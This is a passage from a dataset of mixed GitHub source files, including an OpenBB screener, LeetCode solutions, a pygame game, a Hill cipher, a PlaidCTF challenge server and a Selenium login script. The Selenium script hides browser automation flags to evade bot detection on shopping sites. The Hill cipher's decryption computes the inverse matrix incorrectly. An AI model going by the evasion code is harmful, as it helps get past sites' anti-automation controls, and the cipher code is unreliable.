\"high_IV\"\n self.screen_tickers: List = list()\n\n if session and obbff.USE_PROMPT_TOOLKIT:\n choices: dict = {c: {} for c in self.controller_choices}\n presets: dict = {c: {} for c in self.preset_choices}\n choices[\"view\"] = presets\n choices[\"set\"] = presets\n choices[\"scr\"] = presets\n choices[\"scr\"][\"--limit\"] = None\n choices[\"scr\"][\"-l\"] = \"--limit\"\n\n self.completer = NestedCompleter.from_nested_dict(choices)\n\n def print_help(self):\n \"\"\"Print help\"\"\"\n mt = MenuText(\"stocks/options/screen/\")\n mt.add_cmd(\"view\")\n mt.add_cmd(\"set\")\n mt.add_raw(\"\\n\")\n mt.add_param(\"_preset\", self.preset)\n mt.add_raw(\"\\n\")\n mt.add_cmd(\"scr\")\n mt.add_raw(\"\\n\")\n mt.add_param(\"_screened_tickers\", \", \".join(self.screen_tickers))\n mt.add_raw(\"\\n\")\n mt.add_menu(\"ca\")\n console.print(text=mt.menu_text, menu=\"Stocks - Options - Screener\")\n\n @log_start_end(log=logger)\n def call_view(self, other_args: List[str]):\n \"\"\"Process view command\"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n prog=\"view\",\n description=\"\"\"View available presets under presets folder.\"\"\",\n )\n parser.add_argument(\n \"-p\",\n \"--preset\",\n action=\"store\",\n dest=\"preset\",\n type=str,\n help=\"View specific custom preset\",\n default=\"\",\n choices=self.preset_choices,\n )\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-p\")\n ns_parser = self.parse_known_args_and_warn(parser, other_args)\n if ns_parser:\n if ns_parser.preset:\n syncretism_view.view_available_presets(preset=ns_parser.preset)\n\n else:\n for preset in self.preset_choices:\n console.print(preset)\n console.print(\"\")\n\n @log_start_end(log=logger)\n def call_set(self, other_args: List[str]):\n \"\"\"Process set command\"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n prog=\"set\",\n description=\"\"\"Set preset from custom and default ones.\"\"\",\n )\n parser.add_argument(\n \"-p\",\n \"--preset\",\n action=\"store\",\n dest=\"preset\",\n type=str,\n default=\"template\",\n help=\"Filter presets\",\n choices=self.preset_choices,\n )\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-p\")\n ns_parser = self.parse_known_args_and_warn(parser, other_args)\n if ns_parser:\n self.preset = ns_parser.preset\n console.print(\"\")\n\n @log_start_end(log=logger)\n def call_scr(self, other_args: List[str]):\n \"\"\"Process scr command\"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n prog=\"scr\",\n description=\"\"\"Screener filter output from https://ops.syncretism.io/index.html.\n Where: CS: Contract Symbol; S: Symbol, T: Option Type; Str: Strike; Exp v: Expiration;\n IV: Implied Volatility; LP: Last Price; B: Bid; A: Ask; V: Volume; OI: Open Interest;\n Y: Yield; MY: Monthly Yield; SMP: Regular Market Price; SMDL: Regular Market Day Low;\n SMDH: Regular Market Day High; LU: Last Trade Date; LC: Last Crawl; ITM: In The Money;\n PC: Price Change; PB: Price-to-book. \"\"\",\n )\n parser.add_argument(\n \"-p\",\n \"--preset\",\n action=\"store\",\n dest=\"preset\",\n type=str,\n default=self.preset,\n help=\"Filter presets\",\n choices=self.preset_choices,\n )\n parser.add_argument(\n \"-l\",\n \"--limit\",\n type=check_positive,\n default=10,\n help=\"Limit of random entries to display. Default shows all\",\n dest=\"limit\",\n )\n\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-p\")\n ns_parser = self.parse_known_args_and_warn(\n parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED\n )\n if ns_parser:\n self.screen_tickers = syncretism_view.view_screener_output(\n preset=ns_parser.preset,\n limit=ns_parser.limit,\n export=ns_parser.export,\n )\n\n @log_start_end(log=logger)\n def call_ca(self, _):\n \"\"\"Call the comparison analysis menu with selected tickers\"\"\"\n if self.screen_tickers:\n self.queue = ca_controller.ComparisonAnalysisController(\n self.screen_tickers, self.queue\n ).menu(custom_path_menu_above=\"/stocks/\")\n else:\n console.print(\n \"Some tickers must be screened first through one of the presets!\\n\"\n )\n","repo_name":"irvinbma/OpenBBTerminal-Finance","sub_path":"openbb_terminal/stocks/options/screen/screener_controller.py","file_name":"screener_controller.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"10019170759","text":"# You are given an array of integers nums, there is a sliding window of size k which is moving from the very left of the array to the very right. You can only see the k numbers in the window. Each time the sliding window moves right by one position.\n#\n# Return the max sliding window.\n#\n#  \n# Example 1:\n#\n#\n# Input: nums = [1,3,-1,-3,5,3,6,7], k = 3\n# Output: [3,3,5,5,6,7]\n# Explanation: \n# Window position Max\n# --------------- -----\n# [1 3 -1] -3 5 3 6 7 3\n# 1 [3 -1 -3] 5 3 6 7 3\n# 1 3 [-1 -3 5] 3 6 7 5\n# 1 3 -1 [-3 5 3] 6 7 5\n# 1 3 -1 -3 [5 3 6] 7 6\n# 1 3 -1 -3 5 [3 6 7] 7\n#\n#\n# Example 2:\n#\n#\n# Input: nums = [1], k = 1\n# Output: [1]\n#\n#\n# Example 3:\n#\n#\n# Input: nums = [1,-1], k = 1\n# Output: [1,-1]\n#\n#\n# Example 4:\n#\n#\n# Input: nums = [9,11], k = 2\n# Output: [11]\n#\n#\n# Example 5:\n#\n#\n# Input: nums = [4,-2], k = 2\n# Output: [4]\n#\n#\n#  \n# Constraints:\n#\n#\n# \t1 <= nums.length <= 105\n# \t-104 <= nums[i] <= 104\n# \t1 <= k <= nums.length\n#\n#\n\n\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n # 优先队列 MaxHeap \n \n # deque: 双端队列 \n if not nums: return [] \n # window 存储下标\n window, res = [], []\n for i, x in enumerate(nums):\n \n if i >= k and window[0] <= i-k:\n window.pop(0)\n \n while window and nums[window[-1]] <= x:\n window.pop()\n \n window.append(i)\n \n if i >= k -1:\n res.append(nums[window[0]])\n return res\n","repo_name":"chyidl/leetcode","sub_path":"0239-sliding-window-maximum/sliding-window-maximum.py","file_name":"sliding-window-maximum.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"43393850123","text":"from uaperrors import UAPError\nimport sys\nimport os\nimport yaml\nfrom logging import getLogger\nfrom abstract_step import AbstractStep\n\nlogger = getLogger('uap_logger')\n\n\nclass Task(object):\n '''\n A task represents a certain run of a certain step.\n '''\n\n def __init__(self, pipeline, step, run_id, run_index):\n self.pipeline = pipeline\n self.step = step\n self.run_id = run_id\n self.run_index = run_index\n\n def __str__(self):\n return '%s/%s' % (self.step.get_step_name(), self.run_id)\n\n def get_pipeline(self):\n '''\n Returns the pipeline this task belongs to.\n '''\n return self.pipeline\n\n def get_step(self):\n '''\n Returns the step of this task.\n '''\n return self.step\n\n def get_run(self):\n '''\n Returns the run object for this task.\n '''\n return self.step.get_run(self.run_id)\n\n def get_task_state(self, do_hash=False):\n '''\n Proxy method for run.get_state().\n '''\n return self.get_run().get_state(do_hash=do_hash)\n\n def run(self):\n '''\n Run the task. Skip if it's already finished. Raise Exception\n if it's not ready.\n '''\n task_state = self.get_task_state()\n if task_state == self.pipeline.states.FINISHED:\n self.pipeline.notify(\n \"Skipping task: %s is already finished.\" %\n self)\n return\n if task_state == self.pipeline.states.WAITING:\n raise UAPError(\"%s cannot be run yet.\" % self)\n self.step.run(self.run_id)\n\n def input_files(self):\n '''\n Return a list of input files required by this task.\n '''\n result = set()\n run_info = self.get_run()\n for annotation, outfiles in run_info.get_output_files_abspath().items():\n for outpath, infiles in outfiles.items():\n if infiles is not None:\n for path in infiles:\n result.add(path)\n return list(result)\n\n def output_files(self):\n '''\n Return a list of output files produced by this task.\n '''\n result = []\n run_info = self.get_run()\n for annotation, outfiles in run_info.get_output_files_abspath().items():\n for path in outfiles.keys():\n result.append(path)\n return result\n\n def get_parent_tasks(self):\n '''\n Returns a list of parent tasks which this task depends on.\n '''\n result = set()\n for path in self.input_files():\n result.add(self.pipeline.get_task_for_file(path))\n\n return list(result)\n\n def move_ping_file(self, bad_copy=True):\n '''\n Removes the queued ping of a task to remove the QUEUED state\n and optionally keeps \"bad_copy\" to mark the task as BAD.\n '''\n ping_file = self.get_run().get_queued_ping_file()\n self.step.remove_ping_file(ping_file, bad_copy=bad_copy)\n\n def volatilize_if_possible(self, srsly=False):\n result = set()\n if not self.step.is_volatile():\n return result\n fsc = self.get_run().fsc\n for path_a in self.output_files():\n if not path_a:\n continue\n if fsc.exists(path_a):\n # now check whether we can volatilize path A\n path_a_can_be_removed = True\n path_a_dependent_files = list()\n if path_a in self.pipeline.file_dependencies_reverse:\n for path_b in self.pipeline.file_dependencies_reverse[path_a]:\n path_a_dependent_files.append(path_b)\n # don't check whether the output file B exists,\n # it might also be volatile, rather check whether the\n # task which creates B is finished\n path_b_task = self.pipeline.get_task_for_file(path_b)\n if path_b_task.get_task_state() != \\\n self.pipeline.states.FINISHED:\n path_a_can_be_removed = False\n break\n\n if path_a_can_be_removed:\n result.add(path_a)\n if srsly:\n self.pipeline.notify(\n \"Now volatilizing %s: %s\" %\n (str(self), os.path.basename(path_a)))\n info = dict()\n info['self'] = dict()\n info['self']['size'] = fsc.getsize(path_a)\n info['self']['mtime'] = fsc.getmtime(path_a)\n info['downstream'] = dict()\n for path_b in path_a_dependent_files:\n info['downstream'][path_b] = dict()\n if fsc.exists(path_b):\n info['downstream'][path_b]['size'] = fsc.getsize(\n path_b)\n info['downstream'][path_b]['mtime'] = fsc.getmtime(\n path_b)\n else:\n downstream_info = yaml.load(\n open(\n path_b +\n AbstractStep.VOLATILE_SUFFIX,\n 'r'),\n Loader=yaml.FullLoader)\n info['downstream'][path_b]['size'] = downstream_info['self']['size']\n info['downstream'][path_b]['mtime'] = downstream_info['self']['mtime']\n\n path_a_volatile = path_a + AbstractStep.VOLATILE_SUFFIX\n with open(path_a_volatile, 'w') as f:\n f.write(yaml.dump(info, default_flow_style=False))\n\n os.utime(\n path_a_volatile,\n (os.path.getatime(path_a),\n os.path.getmtime(path_a)))\n os.unlink(path_a)\n return result\n","repo_name":"curiousTauseef/uap","sub_path":"include/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":6214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"85"} +{"seq_id":"21198407432","text":"import pygame, sys\n\nclock = pygame.time.Clock()\n\nfrom pygame.locals import *\n\nfrom sprites import * #dialog, logic\n\nimport math\n\nfrom tiles import *\n\nfrom lvl import *\n\nfrom pygame.freetype import *\n\nvec = pygame.math.Vector2\n\npygame.init()\npygame.display.set_caption('V for Ved')\n\nWINDOW_SIZE = (1280,768) #subject to change\nscreen = pygame.display.set_mode(WINDOW_SIZE)\ntile_group = pygame.sprite.Group()\n\n#render = pygame.Surface((1280, 768)) #x value can be changed depending on the level\n\nrender = pygame.Surface((10000, 10000))\n\nplayer = Vee()\nodd = Odd()\n\ndef loadLevel(X, Y):\n for y in range(0,Y): #render tiles based on tile map\n for x in range(0,X):\n coord = level[y][x]\n if coord == 1:\n tile_group.add(Tile(x*64,y*64,'Assets/Tiles/Mossy_Stone/MOSSY_STONE0.png',1,1))\n if coord == 2:\n tile_group.add(Tile(x*64,y*64,'Assets/Tiles/Mossy_Stone/MOSSY_STONE1.png',1,1))\n if coord == 3:\n tile_group.add(Tile(x*64,y*64,'Assets/Tiles/Mossy_Stone/MOSSY_STONETOP.png',1,1))\n\nGAME_FONT = Font('Fonts/manaspace/manaspc.ttf', 24)\n\nplayer_group = pygame.sprite.Group(player)\nnpc_group = pygame.sprite.Group(odd)\n\np_location = [250,250]\np_yvel = 0\n\nmv_r = False\nmv_l = False\njump = False\ncontact_floor = False\n\n#loadLevel(20,12)\n\nloadLevel(26,13)\n\ncamloc = [0,0]\n\ncamx = 0\n\ncamy = 0\n\nwhile True: #gameloop\n screen.fill((24,123,120))\n render.fill((24,123,120))\n\n for event in pygame.event.get():\n \n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYDOWN:\n if event.key == K_RIGHT:\n mv_r = True\n if event.key == K_LEFT:\n mv_l = True\n if event.key == K_UP:\n jump = True\n if event.type == KEYUP:\n if event.key == K_RIGHT:\n mv_r = False\n if event.key == K_LEFT:\n mv_l = False\n if event.key == K_UP:\n jump = False\n \n if player.mv == 'r':\n camx = -3.8\n elif player.mv == 'l':\n camx = 3.8\n elif player.mv == 'c':\n camx *= 0.9\n #camx = 0\n else:\n camx *= 0.9\n #camx = 0\n camy = (player.yvel/10)\n #camx *= 0.8\n \n camloc[0] += camx\n camloc[1] += camy\n\n tile_group.draw(render)\n\n\n player_group.update(mv_l,mv_r, jump)\n player_group.draw(render)\n screen.blit(render, (camloc[0]-3, camloc[1]*2.5+120))\n\n\n text_surface, rect = GAME_FONT.render(\"Hello, VEE!\", (0, 0, 0))\n screen.blit(text_surface, (140+camloc[0]*2, 250+camloc[1]*2))\n\n #npc_group.update()\n #npc_group.draw(screen)\n \n \n pygame.display.update()\n \n clock.tick(10)","repo_name":"cvtsh248/V-For-Ved","sub_path":"Scripts/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10910316655","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np\n\ndef chiffrement_hill(message, matrice_cle):\n # Convertir le message en lettres majuscules et supprimer les espaces\n message = message.replace(\" \", \"\").upper()\n\n # Vérifier si la longueur du message est compatible avec la taille de la matrice clé\n if len(message) % len(matrice_cle) != 0:\n raise ValueError(\"La longueur du message doit être un multiple de la taille de la matrice clé\")\n\n # Initialiser le texte chiffré\n texte_chiffre = \"\"\n\n # Itérer à travers le message par blocs de la taille de la matrice clé\n for i in range(0, len(message), len(matrice_cle)):\n bloc = message[i:i + len(matrice_cle)]\n vecteur_message = np.array([ord(caractere) - ord('A') for caractere in bloc])\n vecteur_chiffre = np.dot(matrice_cle, vecteur_message) % 26\n bloc_chiffre = ''.join([chr(caractere + ord('A')) for caractere in vecteur_chiffre])\n texte_chiffre += bloc_chiffre\n\n return texte_chiffre\n\n\n# In[8]:\n\n\nmatrice_cle = np.array([[6, 24, 1], [13, 16, 10], [20, 17, 15]])\nmessage = \"HELLOO\"\nmessage_chiffre = chiffrement_hill(message, matrice_cle)\nprint(\"Message Chiffré:\", message_chiffre)\n\n\n# In[4]:\n\n\nimport numpy as np\n\ndef dechiffrement_hill(texte_chiffre, matrice_cle):\n # Calculer la matrice inverse de la matrice de clé\n determinant = int(round(np.linalg.det(matrice_cle)))\n matrice_inverse = np.linalg.inv(matrice_cle)\n matrice_inverse = (matrice_inverse * determinant) % 26\n matrice_inverse = matrice_inverse.astype(int)\n\n # Convertir le texte chiffré en lettres majuscules\n texte_chiffre = texte_chiffre.upper()\n\n # Initialiser le texte déchiffré\n texte_dechiffre = \"\"\n\n # Itérer à travers le texte chiffré en blocs de la taille de la matrice clé\n for i in range(0, len(texte_chiffre), len(matrice_cle)):\n bloc = texte_chiffre[i:i + len(matrice_cle)]\n vecteur_chiffre = np.array([ord(caractere) - ord('A') for caractere in bloc])\n vecteur_dechiffre = np.dot(matrice_inverse, vecteur_chiffre) % 26\n bloc_dechiffre = ''.join([chr(caractere + ord('A')) for caractere in vecteur_dechiffre])\n texte_dechiffre += bloc_dechiffre\n\n return texte_dechiffre\n\n\n# In[10]:\n\n\n# Exemple d'utilisation :\nmatrice_cle = np.array([[6, 24, 1], [13, 16, 10], [20, 17, 15]])\nmessage_chiffre = \"TFJANS\"\nmessage_dechiffre = dechiffrement_hill(message_chiffre, matrice_cle)\nprint(\"Message Déchiffré:\", message_dechiffre)\n\n","repo_name":"yazidiyassine/Cryptography","sub_path":"chiffrement de Hill.py","file_name":"chiffrement de Hill.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14180122108","text":"import codecs\nimport xlrd\nimport csv\nimport os\n\n# 将源目录下的 xlsx 文件转移到目的目录下,并修改格式为 csv\ndef xlsxTocsv(source_dir,target_dir):\n L = []\n for root, dirs, files in os.walk(source_dir):\n for file in files:\n if os.path.splitext(file)[1] == '.xlsx':\n L.append(os.path.join(root, file).replace('\\\\','/'))\n\n for path in L:\n\n path = './' + path\n print(path)\n\n name = path.split('/')[3].split('_')[0]\n print(name)\n\n workbook = xlrd.open_workbook(path)\n table = workbook.sheet_by_index(0)\n res = target_dir + name + '_reports_data.csv'\n with codecs.open(res, 'w', encoding='utf-8') as f:\n write = csv.writer(f)\n for row_num in range(table.nrows):\n row_value = table.row_values(row_num)\n write.writerow(row_value)\n\nxlsxTocsv('20210408_14-32-55','./CSVdata/')","repo_name":"Hanqing1996/multifactor-framework-strategy","sub_path":"DealWithReportsTable/xlsx_to_csv.py","file_name":"xlsx_to_csv.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34960877738","text":"from flask import render_template, flash, redirect, request, send_from_directory, url_for\nimport uuid\nimport os\nimport subprocess\nimport random\n\ncwd = os.getcwd()\ntmp_path = \"/tmp/echo/\"\nserve_dir = \"audio/\"\ndocker_cmd = \"docker run -m=100M --cpu-period=100000 --cpu-quota=40000 --network=none -v {path}:/share lumjjb/echo_container:latest python run.py\"\nconvert_cmd = \"ffmpeg -i {in_path} -codec:a libmp3lame -qscale:a 2 {out_path}\"\n\nMAX_TWEETS = 4\nMAX_TWEET_LEN = 140\n\n\nfrom flask import Flask\napp = Flask(__name__)\nflag = \"PCTF{XXXXXXX...XXXXXXXX}\"\n\nif not os.path.exists(tmp_path):\n os.makedirs(tmp_path)\n\n\ndef process_flag (outfile):\n with open(outfile,'w') as f:\n for x in flag:\n c = 0\n towrite = ''\n for i in range(65000 - 1):\n k = random.randint(0,127)\n c = c ^ k\n towrite += chr(k)\n\n f.write(towrite + chr(c ^ ord(x)))\n return\n\ndef process_audio (path, prefix, n):\n target_path = serve_dir + prefix\n if not os.path.exists(target_path):\n os.makedirs(target_path)\n\n for i in range(n):\n st = os.stat(path + str(i+1) + \".wav\")\n if st.st_size < 5242880:\n subprocess.call (convert_cmd.format(in_path=path + str(i+1) + \".wav\",\n out_path=target_path + str(i+1) + \".wav\").split())\n\n\n@app.route('/audio/')\ndef static_file(path):\n return send_from_directory('audio', path)\n\n@app.route(\"/listen\",methods=['GET', 'POST'])\ndef listen_tweets():\n n = int(request.args['n'])\n my_uuid = request.args['my_uuid']\n\n if n > MAX_TWEETS:\n return \"ERR: More than MAX_TWEETS\"\n\n afiles = [my_uuid + \"/\" + str(i+1) + \".wav\" for i in range(n)]\n return render_template('listen.html', afiles = afiles)\n\n@app.route(\"/\",methods=['GET', 'POST'])\ndef read_tweets():\n t1 = request.args.get('tweet_1')\n if t1:\n tweets = []\n for i in range(MAX_TWEETS):\n t = request.args.get('tweet_' + str(i+1))\n if len(t) > MAX_TWEET_LEN:\n return \"ERR: Violation of max tween length\"\n\n if not t:\n break\n tweets.append(t)\n\n my_uuid = uuid.uuid4().hex\n my_path = tmp_path + my_uuid + \"/\"\n\n if not os.path.exists(my_path):\n os.makedirs(my_path)\n\n with open(my_path + \"input\" ,\"w\") as f:\n f.write('\\n'.join(tweets))\n\n process_flag(my_path + \"flag\")\n\n out_path = my_path + \"out/\"\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n\n subprocess.call(docker_cmd.format(path=my_path).split())\n process_audio(out_path, my_uuid + '/', len(tweets))\n\n return redirect(url_for('.listen_tweets', my_uuid=my_uuid, n=len(tweets)))\n\n else:\n return render_template('form.html')\n\nif __name__ == \"__main__\":\n app.run(threaded=True)\n","repo_name":"Qwaz/solved-hacking-problem","sub_path":"PlaidCTF/2017/echo/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"85"} +{"seq_id":"31061873373","text":"# import module from tkinter for UI\r\nfrom tkinter import *\r\nimport os\r\nfrom datetime import datetime;\r\n\r\n# creating instance of TK\r\nroot = Tk()\r\n\r\nroot.configure(background=\"white\")\r\n\r\n\r\ndef function1():\r\n os.system(\"python car.py\")\r\n\r\n\r\ndef function2():\r\n os.system(\"python two_wheeler.py\")\r\n\r\n\r\ndef function3():\r\n os.system(\"python pedestrian.py\")\r\n\r\n\r\ndef function4():\r\n os.system(\"python bus.py\")\r\n\r\n\r\ndef function6():\r\n root.destroy()\r\n\r\n\r\n# stting title for the window\r\n\r\nroot.title(\"Vehicle Finder\")\r\n\r\n# creating a text label\r\nLabel(root, text=\"Vehicle and Pedestrian Detection\", font=(\"times new roman\", 20), fg=\"white\", bg=\"black\",\r\n height=3).grid(row=0, rowspan=2, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\n# creating first button\r\nButton(root, text=\"CAR DETECTION\", font=(\"times new roman\", 20), bg=\"#000000\", fg='green', command=function1).grid(\r\n row=4, columnspan=2, sticky=W + E + N + S, padx=5, pady=5)\r\n\r\n# creating second button\r\nButton(root, text=\"TWO WHEELER DETECTION\", font=(\"times new roman\", 20), bg=\"#000000\", fg='green',\r\n command=function2).grid(row=5, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\n# creating third button\r\nButton(root, text=\"PEDESTRIAN DETECTION\", font=('times new roman', 20), bg=\"#000000\", fg=\"green\",\r\n command=function3).grid(row=6, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\nButton(root, text=\"BUS DETECTION\", font=('times new roman', 20), bg=\"#000000\", fg=\"green\", command=function4).grid(\r\n row=7, columnspan=2, sticky=N + E + W + S, padx=5, pady=5)\r\n\r\nButton(root, text=\"EXIT\", font=('times new roman', 20), bg=\"black\", fg=\"red\", command=function6).grid(row=9,\r\n columnspan=2,\r\n sticky=N + E + W + S,\r\n padx=5, pady=5)\r\n\r\nroot.mainloop()\r\n","repo_name":"ps217/Vehicle-Detection","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23264655606","text":"# Given an array nums containing n + 1 integers where each integer is between 1 and n (inclusive), prove that at least one duplicate number must exist. Assume that there is only one duplicate number, find the duplicate one.\n\n# Example 1:\n\n# Input: [1,3,4,2,2]\n# Output: 2\n# Example 2:\n\n# Input: [3,1,3,4,2]\n# Output: 3\n\n\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n left, right = 1, len(nums)-1\n while left < right:\n mid = (left + right) // 2\n cnt = 0\n for num in nums:\n if num <= mid:\n cnt += 1\n if cnt > mid:\n right = mid \n else:\n left = mid + 1 \n return left\n\n# Time: O(nlog(n))\n# Space: O(1)\n# Difficulty: medium","repo_name":"wenxinjie/leetcode","sub_path":"binary search/python/leetcode287_Find_the_Duplicate_Number.py","file_name":"leetcode287_Find_the_Duplicate_Number.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6789465472","text":"import os.path\nfrom data.base_dataset import BaseDataset, normalize\nfrom data.image_folder import make_dataset\nfrom functools import partial\nimport re\n\n\ndef extract_frame_id_int(path, pattern):\n # extract frame id as int\n return int(pattern.search(path).group(1))\n\n\nclass FrameDataset(BaseDataset):\n def __init__(self, root=None, opt=None):\n if root:\n self.root = root\n self.opt = opt\n self.dir_frames = root\n self.sort_key = partial(extract_frame_id_int,\n pattern=re.compile('(\\d+)[\\.jpg|\\.png]'))\n self.frame_paths = sorted([i for i in make_dataset(self.root)],\n key=self.sort_key)\n self.frame_count = len(self.frame_paths)\n self.dataset_size = self.frame_count - 1\n\n def initialize(self, opt):\n self.opt = opt\n self.root = opt.dataroot\n\n ### frames\n dir_frames = '_frames'\n self.dir_frames = os.path.join(opt.dataroot, opt.phase + dir_frames)\n self.dir_frames = self.sort()\n self.frame_paths = sorted([i for i in make_dataset(self.dir_frames)],\n key=self.sort_key)\n self.frame_count = len(self.frame_paths)\n self.dataset_size = self.frame_count - 1\n\n print(\"FrameDataset initialized from: %s\" % self.dir_frames)\n print(\"contains %d frames, %d consecutive pairs\" % (self.frame_count, self.dataset_size))\n\n def __getitem__(self, index):\n\n left_frame_path = self.frame_paths[index]\n right_frame_path = self.frame_paths[index+1]\n\n input_dict = {\n 'left_path': left_frame_path,\n 'right_path': right_frame_path,\n }\n\n return input_dict\n\n def __len__(self):\n # batchSize>1 not tested\n return self.dataset_size\n\n def name(self):\n return 'FrameDataset'\n","repo_name":"Kebniss/AutoDetect","sub_path":"Unsupervised/pix2pixHD/data/frame_dataset.py","file_name":"frame_dataset.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"13152859432","text":"from collections import deque\nimport copy\ndef solution(n, computers):\n '''\n 그래프 탐색을 통해 노드와 모든 연결된 노드를 탐색하고, 시작 노드를 방문처리\n computers모든 노드에 대해 반복한다.\n '''\n def dfs(graph, v, visited):\n visited[v] = True\n n = len(graph)\n for node in range(n):\n if graph[v][node] == 1 and visited[node] == False:\n dfs(graph, node, visited)\n\n answer = 0\n visited = [0] * n\n for start in range(n): #n개의 노드를 각각 시작노드로 dfs\n if visited[start] == 0: #이전 탐색에서 방문하지 않았을 경우에만 탐색 시작\n dfs(computers, start, visited)\n answer +=1\n return answer\n\ndef main(n, computers):\n result = dict()\n for s in range(n): # N\n q = deque() # 1\n q.append(s) # 1\n visit_info = set()\n visit_info.add(s)\n tmp = copy.deepcopy(computers)\n while q: # N\n c = q.popleft() # 1\n for i in range(n):\n if tmp[c][i] ==1:\n visit_info.add(i)\n q.append(i)\n # if i == c:\n # tmp[c][i] = 0\n # else:\n # tmp[c][i] = 0\n # tmp[c][i] = 0\n # for i in range(n): # N\n # if i == c: # 1\n # tmp[c][i] = 0 # 2n+1\n # # visit_info.add(i)\n # else: # 1\n # if tmp[c][i] == 1: #1\n # tmp[c][i] = 0 # 2n+1\n # tmp[i][c] = 0 # 2n+1\n # q.append(i) # 1\n # # visit_info.add(i)\n\n\n result[s] = visit_info\n print(result)\n\n\n\n# 3, [[1, 1, 0], [1, 1, 0], [0, 0, 1]] -> 2\n# 3, [[1, 1, 0], [1, 1, 1], [0, 1, 1]] ->1\nif __name__ == \"__main__\":\n ret = solution(3, [[1, 1, 0], [1, 1, 1], [0, 1, 1]] )\n # ret = solution(3, [[1, 1, 0], [1, 1, 0], [0, 0, 1]])\n print(ret)","repo_name":"HyunaShin/AlgorithmInterview","sub_path":"solved/programmers/dfs_bfs_43162.py","file_name":"dfs_bfs_43162.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10506878691","text":"import time\nfrom selenium import webdriver\n\nimport common.fileUtil as FileUtil\nimport task.LeetcodeTask as LeetcodeTask\nimport task.JDTask as JDTask\nimport task.Taobao as Taobao\n\n# 通过指定chromedriver的路径来实例化driver对象,chromedriver放在当前目录。\n# driver = webdriver.Chrome(executable_path='./chromedriver')\n# chromedriver已经添加环境变量\ndriver = webdriver.Chrome()\n#cdp破解反爬虫\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n \"source\": \"\"\"\n   Object.defineProperty(navigator, 'webdriver', {\n   get: () => undefined\n   })\n   \"\"\"\n})\n\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-automation'])\noptions.add_experimental_option('useAutomationExtension', False)\n# options.add_argument(\"--disable-blink-features=AutomationControlled\")\n\nif FileUtil.read_yaml(\"leetcode\", \"execute\"):\n LeetcodeTask.loginLeetcode(driver)\n\nmobileEmulation = {'deviceName': 'iPhone X'}\noptions.add_experimental_option('mobileEmulation', mobileEmulation)\noptions.add_experimental_option('excludeSwitches',['enable-automation'])\noptions.add_experimental_option('useAutomationExtension', False)\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n \"source\": \"\"\"\n   Object.defineProperty(navigator, 'webdriver', {\n   get: () => undefined\n   })\n   \"\"\"\n})\n#\n#\n# if FileUtil.read_yaml(\"JD\",\"execute\"):\n# JDTask.JDLogin(driver)\n#\nif FileUtil.read_yaml(\"Taobao\", \"execute\"):\n Taobao.TaobaoLogin(driver)\n\ntime.sleep(100)\n# # 退出浏览器\n# driver.quit()\n","repo_name":"youcai922/seleniumDemo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"75097441238","text":"import random\n\n\ndef flatten_json(y):\n '''Flattens the JSON data\n '''\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '__')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '__')\n i += 1\n else:\n out[name[:-2]] = x\n\n flatten(y)\n\n return out\n\n\ndef retry_timer(which_retry, retry_base_interval, mode=None):\n \"\"\"Calculate a random retry interval\n\n Args:\n mode(optional, default=None): specify the mode of retry time\n list of possible values: 'random', 'multiply', 'multirand'\n \"\"\"\n\n if mode is None:\n mode = 'random'\n\n if mode == 'random':\n retry_wait_interval = 